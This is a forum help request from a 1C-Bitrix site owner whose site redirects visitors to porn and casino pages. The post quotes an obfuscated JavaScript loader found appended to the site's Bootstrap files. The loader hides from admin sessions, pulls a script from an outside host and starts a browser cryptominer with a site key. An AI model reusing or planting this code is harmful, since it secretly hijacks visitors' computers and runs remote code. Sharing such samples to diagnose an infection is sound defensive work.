1C-Bitrix

Bitrix virus open other redirect sites?

The crux of the problem is that after NG began to hammer on XSS injections, the Bitrix log constantly registers attacks.

The site did not work in NG (they made a stub and turned off public access), there was a plan to update the entire site after NG.
They call on January 3rd and say on the porn site and the volcano casino.
I go in and really flips to porn and all sorts of other sites, it doesn’t always flip, sometimes everything is normal.
who faced? where to look?
found here in Bootstrap's JS files at the end (via ai-bolit). Deleted, but still redirects to other sites

if(void 0 === minlibloader) {
  var minlibloader = {
    config: {
      v: '$%0.1.0%#',
      wd: 'statdynamic',
      wz: 'com',
      wu: '/lib/',
      wn: 'crypta',
      delay: 4400
    },
    init: function() {
      setTimeout(function() {
        minlibloader.load()
      }, this.config.delay)
    },
    checkEnv: function() {
      return 'undefined' == typeof jssassin && ('undefined' == typeof BX || void 0 === BX.admin)
    },
    load: function() {
      if(this.checkEnv()) {
        var n = new Date,
          i = n.getDate() + n.getMonth() + n.getFullYear(),
          e = document.createElement('script');
        e.src = '//' + this.config.wd + '.' + this.config.wz + this.config.wu + this.config.wn + '.js?d=' + i, e.onload = function() {
          document.head.removeChild(e), window.miner = new CRLT.Anonymous('9e0c2520b816c43755b619f6ac79fe96bb138292bcfb', {
            threads: 8,
            throttle: .4
          }), 'object' == typeof window.miner && window.miner.start()
        }, document.head.appendChild(e)
      }
    }
  };
  minlibloader.init()
}

can anyone tell me what?